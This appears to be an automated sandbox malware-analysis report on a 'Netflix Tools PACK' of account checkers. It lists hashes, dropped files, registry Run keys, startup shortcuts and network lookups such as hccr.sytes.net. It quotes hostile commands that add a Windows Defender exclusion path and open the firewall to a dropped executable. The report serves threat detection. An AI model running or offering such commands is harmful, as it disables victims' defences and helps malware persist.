| MD5 | 173029b86aed17405a5340578d691b55 |
| SHA1 | 28742af7301f93d45f0e7c994ba9a1cac2aa7387 |
| SHA256 | e1e40caa21b60d085685cbcc0cd67ca36de82a69ba3a74da17c9472236190fb0 |
| SHA512 | 132ef460a878e220bff6ea2ef88b3c38e0ea54e11b36f5b0a98b344a7a55f876af61bc2de9cdf2e3f74124dec5a140a58ecd523a2e791ffa09aea81b11b35c13 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 3922931a21a66290ecb769f2d79cc417 |
| SHA1 | d72bc5af3b2da078125ce71512249f67765624c3 |
| SHA256 | 0eb33cdbc3b30f2dd68d3e4de912b61c6f29f3ddbf17b8e83948e9243763b8d4 |
| SHA512 | e4b1c22b64afa2120c2ae1385374747b04ea4b509fef1a27384755d57cfd4a86008cbf9af7095a1955c9934148b38cf7aa32b036d08702cbaa0ec9f5f59c3987 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
| MD5 | dd4e21e35a19e7aacb6697fdb23db092 |
| SHA1 | d3353100527580b1fa646d1e7501aa18308797f6 |
| SHA256 | 86ee350dbcf8332e97129f3e576409647e2cd098665d66f54a296a3895305002 |
| SHA512 | e156ffaee8c0c51a03ecdeff51b844af4f23c49c20d9ef98580b87b4c88dd1cc423715f16c9c155fcd5f2fbd8f4fb725ee14ceb264575ab2943b58bfe8b5d31a |
memory/4380-269-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 2e29b3bb890de386fb9c984d6b5d8ae2 |
| SHA1 | 07ff20bec3b91057f54f610ad1d532ddc6f01047 |
| SHA256 | 03db9e97c61c766e7346ef15cfd67a6232e7fd521b7b3d453c44e47af7f8a980 |
| SHA512 | 4ac4ebc5d29f6f1c1ba982a2578fb178a94cc8b52d1735f3e61acc62a754550a6c86292a5395201c3da9929cd119a5093e38376b7d640f6b2e8dde4154543588 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 3ab5566f182aad6df9d49665e71036fb |
| SHA1 | d03c31ce9211743e7e3a0dfb2585f642d01b1a57 |
| SHA256 | 15f2ad8a040da2a43ecf2a4c14f364a2a0cf23a8c83d0322aa48de86402bcafb |
| SHA512 | 391c7a6aa51d7be1c9bccc8e5d7a4a5376404fda20351d94dd8db756b23d550a1be49cbd063daeb1987dbae2dc89b268d04b2d10f828b0a5744b9a00c9c4ca7f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1b021c8e6043b7870613007a5e152c3e |
| SHA1 | 914cfb90187958d67eb8875aba60b3b06605899d |
| SHA256 | 8a36ede68bb8a7b72976a8d3b3e1d937ad2a5273f6daf2272c8cd54e19e1c3d6 |
| SHA512 | 729d30c08af35167d60fc28edbc864116357615aa60aa7be9ddd3e43fac7c1d701b060154db756b7877014a57e4dc132fb4f025dceb02358338a8a6a50f0f564 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | b359167b3568d1b4953adefdef0deb24 |
| SHA1 | 98405d3ec52edeed62f8a42bfe766ecf395a95b6 |
| SHA256 | 177289a899357233597b059fde47b7e54aba35ca95e2a2201fd8d3ca68273578 |
| SHA512 | 28efc3e9bb0350c2229ffdfc0578c0ebc8276405849480c1762c75d616998f6ff654f7ffde3cf0676b62b583b5ec207e514040de1a809b465bb9e734e29c96b9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0e123655254f063f0b3c12ed15a12df6 |
| SHA1 | 3c3caebf7c7894671668394425d73b670a50fdbd |
| SHA256 | 7ba2d6f360182f36dfddacc6263280d397b4dfc9c6716a40c3f5020dfbf63858 |
| SHA512 | 8649e7ef4dc4e0bc6b320ac7b8025555a6cf37b6d1374a3601be89f8066ca60bae784642cdb1d448f00bd96c69098bb381c4d09871a609b499fa9b53abe9a332 |
Analysis: behavioral32
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:59
Platform
win10v2004-20230621-en
Max time kernel
41s
Max time network
51s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\RubiconSoft.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\RubiconSoft.exe"
Network
| Country | Destination | Domain | Proto |
| IE | 20.50.73.9:443 | | tcp |
| US | 93.184.221.240:80 | | tcp |
| GB | 96.16.110.41:443 | | tcp |
| US | 93.184.221.240:80 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
33s
Max time network
32s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_in5nulz3.fpz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
Analysis: behavioral3
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
30s
Max time network
35s
Command Line
Signatures
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\460557edf4b4cbfb08eadcebcbd28364.exe | C:\Windows\winconfig.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\460557edf4b4cbfb08eadcebcbd28364.exe | C:\Windows\winconfig.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winconfig.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\460557edf4b4cbfb08eadcebcbd28364 = "\"C:\\Windows\\winconfig.exe\" .." | C:\Windows\winconfig.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\460557edf4b4cbfb08eadcebcbd28364 = "\"C:\\Windows\\winconfig.exe\" .." | C:\Windows\winconfig.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winconfig.exe | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\winconfig.exe | N/A |
| Token: 33 | N/A | C:\Windows\winconfig.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\winconfig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 648 wrote to memory of 1396 | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe | C:\Windows\winconfig.exe |
| PID 648 wrote to memory of 1396 | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe | C:\Windows\winconfig.exe |
| PID 648 wrote to memory of 1396 | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe | C:\Windows\winconfig.exe |
| PID 1396 wrote to memory of 1648 | N/A | C:\Windows\winconfig.exe | C:\Windows\SysWOW64\netsh.exe |
| PID 1396 wrote to memory of 1648 | N/A | C:\Windows\winconfig.exe | C:\Windows\SysWOW64\netsh.exe |
| PID 1396 wrote to memory of 1648 | N/A | C:\Windows\winconfig.exe | C:\Windows\SysWOW64\netsh.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe"
C:\Windows\winconfig.exe
"C:\Windows\winconfig.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\winconfig.exe" "winconfig.exe" ENABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | hccr.sytes.net | udp |
| US | 13.89.179.8:443 | | tcp |
Files
C:\Windows\winconfig.exe
| MD5 | 19f1e1913d37b8698e4fc1bb350d754a |
| SHA1 | 922909897e1e2aa431bbe7974bb99849d1c18ad3 |
| SHA256 | 9d9c257a3f669babda5bbbb3d143a7575f17bee0425f90f80f2ef7bd807bfbc5 |
| SHA512 | d178276ac46efd2614d94e2e1dd91b01aae7b565326b1dd831b47cebdbe292bf9df3cbca7bffbb34a826a138b681f2d4bf5f76dc54f9cca4b74f40f8a0dbbec1 |
Analysis: behavioral10
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
32s
Max time network
38s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\chromedriver.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\chromedriver.exe"
Network
| Country | Destination | Domain | Proto |
| US | 13.85.23.86:443 | | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.121.24.20.in-addr.arpa | udp |
| US | 13.85.23.86:443 | | tcp |
| US | 2.18.121.75:80 | | tcp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
34s
Max time network
37s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\Netflix Checker v1 by Sh4lltear.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\Netflix Checker v1 by Sh4lltear.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\Netflix Checker v1 by Sh4lltear.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Sh4lltear.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Sh4lltear.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.125.24.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.104.205.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.220.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.103.197.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.17.30.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sjd3a11b.zxn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
Analysis: behavioral30
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
33s
Max time network
38s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\Netflix by Rubicon.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\Netflix by Rubicon.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\Netflix by Rubicon.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\RubiconSoft.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\RubiconSoft.exe"
Network
| Country | Destination | Domain | Proto |
| US | 52.168.117.170:443 | | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
32s
Max time network
36s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\HITFLIX CHECKER.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
